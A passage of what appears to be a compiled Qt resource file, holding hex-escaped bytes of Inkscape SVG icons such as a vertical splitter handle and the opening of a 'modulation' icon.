\x67\x3a\x30\x70\x78\x3b\x77\x6f\x72\x64\x2d\x73\x70\x61\x63\x69\
\x6e\x67\x3a\x30\x70\x78\x3b\x66\x69\x6c\x6c\x3a\x23\x30\x30\x35\
\x35\x64\x34\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\
\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x6e\x6f\x6e\x65\x22\x0a\
\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x74\x65\x78\x74\x35\
\x30\x34\x36\x22\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x70\x61\x74\
\x68\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x3d\x22\x4d\x20\
\x33\x2e\x39\x37\x32\x36\x35\x36\x33\x2c\x31\x37\x2e\x34\x37\x32\
\x36\x35\x36\x20\x48\x20\x32\x39\x2e\x30\x31\x31\x37\x31\x39\x20\
\x56\x20\x32\x32\x2e\x30\x36\x32\x35\x20\x48\x20\x33\x2e\x39\x37\
\x32\x36\x35\x36\x33\x20\x5a\x20\x6d\x20\x30\x2c\x38\x2e\x38\x38\
\x36\x37\x31\x39\x20\x48\x20\x32\x39\x2e\x30\x31\x31\x37\x31\x39\
\x20\x76\x20\x34\x2e\x36\x32\x38\x39\x30\x36\x20\x48\x20\x33\x2e\
\x39\x37\x32\x36\x35\x36\x33\x20\x5a\x20\x4d\x20\x31\x37\x2e\x35\
\x38\x35\x39\x33\x37\x2c\x31\x30\x2e\x35\x33\x39\x30\x36\x33\x20\
\x68\x20\x2d\x33\x2e\x35\x33\x35\x31\x35\x36\x20\x76\x20\x2d\x30\
\x2e\x34\x36\x38\x37\x35\x20\x71\x20\x30\x2c\x2d\x30\x2e\x38\x32\
\x30\x33\x31\x33\x20\x30\x2e\x33\x31\x32\x35\x2c\x2d\x31\x2e\x34\
\x32\x35\x37\x38\x31\x37\x20\x30\x2e\x33\x33\x32\x30\x33\x32\x2c\
\x2d\x30\x2e\x36\x32\x35\x20\x31\x2e\x33\x36\x37\x31\x38\x38\x2c\
\x2d\x31\x2e\x35\x38\x32\x30\x33\x31\x33\x20\x6c\x20\x30\x2e\x36\
\x32\x35\x2c\x2d\x30\x2e\x35\x36\x36\x34\x30\x36\x33\x20\x71\x20\
\x30\x2e\x35\x36\x36\x34\x30\x36\x2c\x2d\x30\x2e\x35\x30\x37\x38\
\x31\x32\x35\x20\x30\x2e\x38\x32\x30\x33\x31\x32\x2c\x2d\x30\x2e\
\x39\x35\x37\x30\x33\x31\x32\x20\x30\x2e\x32\x35\x33\x39\x30\x36\
\x2c\x2d\x30\x2e\x34\x34\x39\x32\x31\x38\x38\x20\x30\x2e\x32\x35\
\x33\x39\x30\x36\x2c\x2d\x30\x2e\x38\x39\x38\x34\x33\x37\x35\x20\
\x30\x2c\x2d\x30\x2e\x36\x38\x33\x35\x39\x33\x37\x20\x2d\x30\x2e\
\x34\x36\x38\x37\x35\x2c\x2d\x31\x2e\x30\x35\x34\x36\x38\x37\x35\
\x20\x2d\x30\x2e\x34\x36\x38\x37\x35\x2c\x2d\x30\x2e\x33\x39\x30\
\x36\x32\x35\x20\x2d\x31\x2e\x33\x30\x38\x35\x39\x33\x2c\x2d\x30\
\x2e\x33\x39\x30\x36\x32\x35\x20\x2d\x30\x2e\x38\x30\x30\x37\x38\
\x31\x2c\x30\x20\x2d\x31\x2e\x37\x31\x38\x37\x35\x2c\x30\x2e\x33\
\x33\x32\x30\x33\x31\x33\x20\x2d\x30\x2e\x39\x31\x37\x39\x36\x39\
\x2c\x30\x2e\x33\x31\x32\x35\x20\x2d\x31\x2e\x38\x39\x34\x35\x33\
\x31\x2c\x30\x2e\x39\x35\x37\x30\x33\x31\x32\x20\x56\x20\x31\x2e\
\x34\x31\x37\x39\x36\x38\x37\x20\x51\x20\x31\x33\x2e\x32\x31\x30\
\x39\x33\x38\x2c\x31\x2e\x30\x30\x37\x38\x31\x32\x35\x20\x31\x34\
\x2e\x31\x38\x37\x35\x2c\x30\x2e\x38\x31\x32\x35\x20\x71\x20\x30\
\x2e\x39\x37\x36\x35\x36\x33\x2c\x2d\x30\x2e\x31\x39\x35\x33\x31\
\x32\x35\x20\x31\x2e\x38\x37\x35\x2c\x2d\x30\x2e\x31\x39\x35\x33\
\x31\x32\x35\x20\x32\x2e\x33\x38\x32\x38\x31\x32\x2c\x30\x20\x33\
\x2e\x36\x33\x32\x38\x31\x32\x2c\x30\x2e\x39\x37\x36\x35\x36\x32\
\x35\x20\x31\x2e\x32\x35\x2c\x30\x2e\x39\x37\x36\x35\x36\x32\x35\
\x20\x31\x2e\x32\x35\x2c\x32\x2e\x38\x33\x32\x30\x33\x31\x32\x20\
\x30\x2c\x30\x2e\x39\x35\x37\x30\x33\x31\x33\x20\x2d\x30\x2e\x33\
\x37\x31\x30\x39\x33\x2c\x31\x2e\x37\x31\x38\x37\x35\x20\x51\x20\
\x32\x30\x2e\x32\x30\x33\x31\x32\x35\x2c\x36\x2e\x39\x30\x36\x32\
\x35\x20\x31\x39\x2e\x32\x36\x35\x36\x32\x35\x2c\x37\x2e\x37\x36\
\x35\x36\x32\x35\x20\x6c\x20\x2d\x30\x2e\x36\x32\x35\x2c\x30\x2e\
\x35\x34\x36\x38\x37\x35\x20\x71\x20\x2d\x30\x2e\x36\x36\x34\x30\
\x36\x33\x2c\x30\x2e\x36\x32\x35\x20\x2d\x30\x2e\x38\x35\x39\x33\
\x37\x35\x2c\x30\x2e\x39\x39\x36\x30\x39\x33\x38\x20\x2d\x30\x2e\
\x31\x39\x35\x33\x31\x33\x2c\x30\x2e\x33\x35\x31\x35\x36\x32\x35\
\x20\x2d\x30\x2e\x31\x39\x35\x33\x31\x33\x2c\x30\x2e\x38\x30\x30\
\x37\x38\x31\x32\x20\x7a\x20\x6d\x20\x2d\x33\x2e\x35\x33\x35\x31\
\x35\x36\x2c\x31\x2e\x34\x34\x35\x33\x31\x32\x20\x68\x20\x33\x2e\
\x35\x33\x35\x31\x35\x36\x20\x76\x20\x33\x2e\x34\x37\x36\x35\x36\
\x33\x20\x68\x20\x2d\x33\x2e\x35\x33\x35\x31\x35\x36\x20\x7a\x22\
\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\
\x22\x66\x69\x6c\x6c\x3a\x23\x30\x30\x35\x35\x64\x34\x3b\x66\x69\
\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x22\x0a\x20\x20\
\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x70\x61\x74\x68\x35\
\x30\x34\x38\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x3c\x2f\x67\x3e\
\x0a\x20\x20\x3c\x2f\x67\x3e\x0a\x3c\x2f\x73\x76\x67\x3e\x0a\
\x00\x00\x09\x70\
\x3c\
\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\
\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\
\x2d\x38\x22\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\
\x6e\x6f\x22\x3f\x3e\x0a\x3c\x21\x2d\x2d\x20\x43\x72\x65\x61\x74\
\x65\x64\x20\x77\x69\x74\x68\x20\x49\x6e\x6b\x73\x63\x61\x70\x65\
\x20\x28\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x29\x20\x2d\x2d\x3e\x0a\
\x0a\x3c\x73\x76\x67\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x64\
\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\
\x72\x67\x2f\x64\x63\x2f\x65\x6c\x65\x6d\x65\x6e\x74\x73\x2f\x31\
\x2e\x31\x2f\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x63\x63\
\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x63\x72\x65\x61\x74\x69\x76\
\x65\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x6f\x72\x67\x2f\x6e\x73\x23\
\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x72\x64\x66\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\
\x67\x2f\x31\x39\x39\x39\x2f\x30\x32\x2f\x32\x32\x2d\x72\x64\x66\
\x2d\x73\x79\x6e\x74\x61\x78\x2d\x6e\x73\x23\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x76\x67\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3d\
\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\
\x72\x67\x2f\x32\x30\x30\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x6f\x64\x69\x70\x6f\x64\x69\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2e\
\x73\x6f\x75\x72\x63\x65\x66\x6f\x72\x67\x65\x2e\x6e\x65\x74\x2f\
\x44\x54\x44\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2d\x30\x2e\x64\
\x74\x64\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\
\x77\x2e\x69\x6e\x6b\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x6e\
\x61\x6d\x65\x73\x70\x61\x63\x65\x73\x2f\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x22\x0a\x20\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x38\x6d\
\x6d\x22\x0a\x20\x20\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x36\
\x6d\x6d\x22\x0a\x20\x20\x20\x76\x69\x65\x77\x42\x6f\x78\x3d\x22\
\x30\x20\x30\x20\x38\x20\x31\x36\x22\x0a\x20\x20\x20\x76\x65\x72\
\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x31\x22\x0a\x20\x20\x20\x69\x64\
\x3d\x22\x73\x76\x67\x38\x22\x0a\x20\x20\x20\x69\x6e\x6b\x73\x63\
\x61\x70\x65\x3a\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x30\x2e\x39\
\x32\x2e\x31\x20\x72\x22\x0a\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\
\x64\x69\x3a\x64\x6f\x63\x6e\x61\x6d\x65\x3d\x22\x73\x70\x6c\x69\
\x74\x74\x65\x72\x5f\x68\x61\x6e\x64\x6c\x65\x5f\x76\x65\x72\x74\
\x69\x63\x61\x6c\x2e\x73\x76\x67\x22\x3e\x0a\x20\x20\x3c\x64\x65\
\x66\x73\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x64\x65\x66\x73\
\x32\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x73\x6f\x64\x69\x70\x6f\x64\
\x69\x3a\x6e\x61\x6d\x65\x64\x76\x69\x65\x77\x0a\x20\x20\x20\x20\
\x20\x69\x64\x3d\x22\x62\x61\x73\x65\x22\x0a\x20\x20\x20\x20\x20\
\x70\x61\x67\x65\x63\x6f\x6c\x6f\x72\x3d\x22\x23\x66\x66\x66\x66\
\x66\x66\x22\x0a\x20\x20\x20\x20\x20\x62\x6f\x72\x64\x65\x72\x63\
\x6f\x6c\x6f\x72\x3d\x22\x23\x36\x36\x36\x36\x36\x36\x22\x0a\x20\
\x20\x20\x20\x20\x62\x6f\x72\x64\x65\x72\x6f\x70\x61\x63\x69\x74\
\x79\x3d\x22\x31\x2e\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3a\x70\x61\x67\x65\x6f\x70\x61\x63\x69\x74\
\x79\x3d\x22\x30\x2e\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3a\x70\x61\x67\x65\x73\x68\x61\x64\x6f\x77\
\x3d\x22\x32\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x3a\x7a\x6f\x6f\x6d\x3d\x22\x31\x31\x2e\x32\x22\x0a\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x78\x3d\
\x22\x32\x38\x2e\x36\x38\x32\x36\x33\x36\x22\x0a\x20\x20\x20\x20\
\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x79\x3d\x22\x33\x35\
\x2e\x31\x32\x38\x36\x37\x39\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\
\x6b\x73\x63\x61\x70\x65\x3a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2d\
\x75\x6e\x69\x74\x73\x3d\x22\x6d\x6d\x22\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x75\x72\x72\x65\x6e\x74\
\x2d\x6c\x61\x79\x65\x72\x3d\x22\x6c\x61\x79\x65\x72\x31\x22\x0a\
\x20\x20\x20\x20\x20\x73\x68\x6f\x77\x67\x72\x69\x64\x3d\x22\x66\
\x61\x6c\x73\x65\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\
\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x31\x39\x32\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x68\x65\x69\
\x67\x68\x74\x3d\x22\x31\x31\x34\x31\x22\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\
\x78\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\
\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x79\x3d\x22\x30\x22\
\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\
\x69\x6e\x64\x6f\x77\x2d\x6d\x61\x78\x69\x6d\x69\x7a\x65\x64\x3d\
\x22\x31\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x6d\x65\x74\x61\x64\x61\
\x74\x61\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x6d\x65\x74\x61\
\x64\x61\x74\x61\x35\x22\x3e\x0a\x20\x20\x20\x20\x3c\x72\x64\x66\
\x3a\x52\x44\x46\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x63\x63\x3a\
\x57\x6f\x72\x6b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\
\x66\x3a\x61\x62\x6f\x75\x74\x3d\x22\x22\x3e\x0a\x20\x20\x20\x20\
\x20\x20\x20\x20\x3c\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x69\
\x6d\x61\x67\x65\x2f\x73\x76\x67\x2b\x78\x6d\x6c\x3c\x2f\x64\x63\
\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\
\x20\x3c\x64\x63\x3a\x74\x79\x70\x65\x0a\x20\x20\x20\x20\x20\x20\
\x20\x20\x20\x20\x20\x72\x64\x66\x3a\x72\x65\x73\x6f\x75\x72\x63\
\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\
\x72\x67\x2f\x64\x63\x2f\x64\x63\x6d\x69\x74\x79\x70\x65\x2f\x53\
\x74\x69\x6c\x6c\x49\x6d\x61\x67\x65\x22\x20\x2f\x3e\x0a\x20\x20\
\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\
\x3c\x2f\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\x0a\x20\x20\x20\x20\
\x20\x20\x3c\x2f\x63\x63\x3a\x57\x6f\x72\x6b\x3e\x0a\x20\x20\x20\
\x20\x3c\x2f\x72\x64\x66\x3a\x52\x44\x46\x3e\x0a\x20\x20\x3c\x2f\
\x6d\x65\x74\x61\x64\x61\x74\x61\x3e\x0a\x20\x20\x3c\x67\x0a\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x6c\x61\x62\
\x65\x6c\x3d\x22\x45\x62\x65\x6e\x65\x20\x31\x22\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x67\x72\x6f\x75\x70\
\x6d\x6f\x64\x65\x3d\x22\x6c\x61\x79\x65\x72\x22\x0a\x20\x20\x20\
\x20\x20\x69\x64\x3d\x22\x6c\x61\x79\x65\x72\x31\x22\x0a\x20\x20\
\x20\x20\x20\x74\x72\x61\x6e\x73\x66\x6f\x72\x6d\x3d\x22\x74\x72\
\x61\x6e\x73\x6c\x61\x74\x65\x28\x30\x2c\x2d\x32\x38\x31\x29\x22\
\x3e\x0a\x20\x20\x20\x20\x3c\x63\x69\x72\x63\x6c\x65\x0a\x20\x20\
\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\x6c\x6c\
\x3a\x23\x30\x30\x30\x30\x30\x30\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\
\x61\x63\x69\x74\x79\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x6e\
\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3a\x30\x2e\x32\x35\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6d\x69\x74\
\x65\x72\x6c\x69\x6d\x69\x74\x3a\x34\x3b\x73\x74\x72\x6f\x6b\x65\
\x2d\x64\x61\x73\x68\x61\x72\x72\x61\x79\x3a\x6e\x6f\x6e\x65\x3b\
\x73\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\
\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x70\x61\x74\
\x68\x34\x34\x38\x37\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x63\x78\
\x3d\x22\x2d\x32\x39\x34\x2e\x39\x38\x36\x34\x38\x22\x0a\x20\x20\
\x20\x20\x20\x20\x20\x63\x79\x3d\x22\x33\x2e\x39\x31\x33\x35\x30\
\x34\x36\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x72\x3d\x22\x31\x2e\
\x39\x31\x33\x35\x30\x34\x35\x22\x0a\x20\x20\x20\x20\x20\x20\x20\
\x74\x72\x61\x6e\x73\x66\x6f\x72\x6d\x3d\x22\x72\x6f\x74\x61\x74\
\x65\x28\x2d\x39\x30\x29\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x3c\
\x63\x69\x72\x63\x6c\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x74\
\x79\x6c\x65\x3d\x22\x66\x69\x6c\x6c\x3a\x23\x30\x30\x30\x30\x30\
\x30\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\
\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\x72\
\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x30\x2e\x32\x35\x3b\x73\
\x74\x72\x6f\x6b\x65\x2d\x6d\x69\x74\x65\x72\x6c\x69\x6d\x69\x74\
\x3a\x34\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x64\x61\x73\x68\x61\x72\
\x72\x61\x79\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\
\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x22\x0a\x20\x20\x20\x20\x20\
\x20\x20\x69\x64\x3d\x22\x70\x61\x74\x68\x34\x34\x38\x37\x2d\x36\
\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x63\x78\x3d\x22\x2d\x32\x38\
\x39\x2e\x30\x38\x36\x34\x39\x22\x0a\x20\x20\x20\x20\x20\x20\x20\
\x63\x79\x3d\x22\x33\x2e\x39\x31\x33\x35\x30\x34\x36\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x72\x3d\x22\x31\x2e\x39\x31\x33\x35\x30\
\x34\x35\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x74\x72\x61\x6e\x73\
\x66\x6f\x72\x6d\x3d\x22\x72\x6f\x74\x61\x74\x65\x28\x2d\x39\x30\
\x29\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x3c\x63\x69\x72\x63\x6c\
\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\
\x66\x69\x6c\x6c\x3a\x23\x30\x30\x30\x30\x30\x30\x3b\x66\x69\x6c\
\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x3b\x73\x74\x72\x6f\
\x6b\x65\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x77\
\x69\x64\x74\x68\x3a\x30\x2e\x32\x35\x3b\x73\x74\x72\x6f\x6b\x65\
\x2d\x6d\x69\x74\x65\x72\x6c\x69\x6d\x69\x74\x3a\x34\x3b\x73\x74\
\x72\x6f\x6b\x65\x2d\x64\x61\x73\x68\x61\x72\x72\x61\x79\x3a\x6e\
\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\x63\x69\
\x74\x79\x3a\x31\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\
\x22\x70\x61\x74\x68\x34\x34\x38\x37\x2d\x37\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x63\x78\x3d\x22\x2d\x32\x38\x32\x2e\x39\x38\x36\
\x34\x38\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x63\x79\x3d\x22\x33\
\x2e\x39\x31\x33\x35\x30\x34\x36\x22\x0a\x20\x20\x20\x20\x20\x20\
\x20\x72\x3d\x22\x31\x2e\x39\x31\x33\x35\x30\x34\x35\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x74\x72\x61\x6e\x73\x66\x6f\x72\x6d\x3d\
\x22\x72\x6f\x74\x61\x74\x65\x28\x2d\x39\x30\x29\x22\x20\x2f\x3e\
\x0a\x20\x20\x3c\x2f\x67\x3e\x0a\x3c\x2f\x73\x76\x67\x3e\x0a\
\x00\x01\x19\x0f\
\x3c\
\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\
\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\
\x2d\x38\x22\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\
\x6e\x6f\x22\x3f\x3e\x0a\x3c\x21\x2d\x2d\x20\x43\x72\x65\x61\x74\
\x65\x64\x20\x77\x69\x74\x68\x20\x49\x6e\x6b\x73\x63\x61\x70\x65\
\x20\x28\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x29\x20\x2d\x2d\x3e\x0a\
\x0a\x3c\x73\x76\x67\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x64\
\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\
\x72\x67\x2f\x64\x63\x2f\x65\x6c\x65\x6d\x65\x6e\x74\x73\x2f\x31\
\x2e\x31\x2f\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x63\x63\
\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x63\x72\x65\x61\x74\x69\x76\
\x65\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x6f\x72\x67\x2f\x6e\x73\x23\
\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x72\x64\x66\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\
\x67\x2f\x31\x39\x39\x39\x2f\x30\x32\x2f\x32\x32\x2d\x72\x64\x66\
\x2d\x73\x79\x6e\x74\x61\x78\x2d\x6e\x73\x23\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x76\x67\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3d\
\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\
\x72\x67\x2f\x32\x30\x30\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x6f\x64\x69\x70\x6f\x64\x69\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2e\
\x73\x6f\x75\x72\x63\x65\x66\x6f\x72\x67\x65\x2e\x6e\x65\x74\x2f\
\x44\x54\x44\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2d\x30\x2e\x64\
\x74\x64\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\
\x77\x2e\x69\x6e\x6b\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x6e\
\x61\x6d\x65\x73\x70\x61\x63\x65\x73\x2f\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x22\x0a\x20\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x36\
\x70\x78\x22\x0a\x20\x20\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\
\x36\x70\x78\x22\x0a\x20\x20\x20\x76\x69\x65\x77\x42\x6f\x78\x3d\
\x22\x30\x20\x30\x20\x31\x36\x20\x31\x36\x22\x0a\x20\x20\x20\x76\
\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x31\x22\x0a\x20\x20\x20\
\x69\x64\x3d\x22\x53\x56\x47\x52\x6f\x6f\x74\x22\x0a\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x76\x65\x72\x73\x69\x6f\x6e\
\x3d\x22\x30\x2e\x39\x32\x2e\x31\x20\x72\x22\x0a\x20\x20\x20\x73\
\x6f\x64\x69\x70\x6f\x64\x69\x3a\x64\x6f\x63\x6e\x61\x6d\x65\x3d\
\x22\x6d\x6f\x64\x75\x6c\x61\x74\x69\x6f\x6e\x2e\x73\x76\x67\x22\
\x3e\x0a\x20\x20\x3c\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x6e\x61\
\x6d\x65\x64\x76\x69\x65\x77\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\
\x22\x62\x61\x73\x65\x22\x0a\x20\x20\x20\x20\x20\x70\x61\x67\x65\
\x63\x6f\x6c\x6f\x72\x3d\x22\x23\x66\x66\x66\x66\x66\x66\x22\x0a\
\x20\x20\x20\x20\x20\x62\x6f\x72\x64\x65\x72\x63\x6f\x6c\x6f\x72\
\x3d\x22\x23\x36\x36\x36\x36\x36\x36\x22\x0a\x20\x20\x20\x20\x20\
\x62\x6f\x72\x64\x65\x72\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x31\
\x2e\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\
\x65\x3a\x70\x61\x67\x65\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x30\
\x2e\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\
\x65\x3a\x70\x61\x67\x65\x73\x68\x61\x64\x6f\x77\x3d\x22\x32\x22\
\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x7a\
\x6f\x6f\x6d\x3d\x22\x33\x32\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\
\x6b\x73\x63\x61\x70\x65\x3a\x63\x78\x3d\x22\x38\x2e\x30\x33\x38\
\x35\x38\x32\x32\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\
\x61\x70\x65\x3a\x63\x79\x3d\x22\x38\x2e\x33\x34\x39\x32\x34\x32\
\x34\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\
\x3a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2d\x75\x6e\x69\x74\x73\x3d\
\x22\x70\x78\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\
